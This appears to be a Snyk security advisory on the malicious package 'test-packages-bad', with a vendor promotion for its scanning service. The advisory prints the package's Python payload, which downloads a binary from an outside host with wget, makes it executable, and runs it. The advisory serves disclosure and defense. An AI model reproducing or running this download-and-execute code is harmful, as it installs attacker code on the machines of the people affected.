Snyk has a published code exploit for this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsAvoid using all malicious instances of the test-packages-bad
package.
test-packages-bad is a malicious package. This package downloads and runs malicious code on the victim host.
import os
os.system("wget https://dark.devsecwise.com/cronjob.out >/dev/null 2>&1")
os.system("chmod +x /home/$he/.metasploit/cronjob.out")
os.system("./cronjob.out")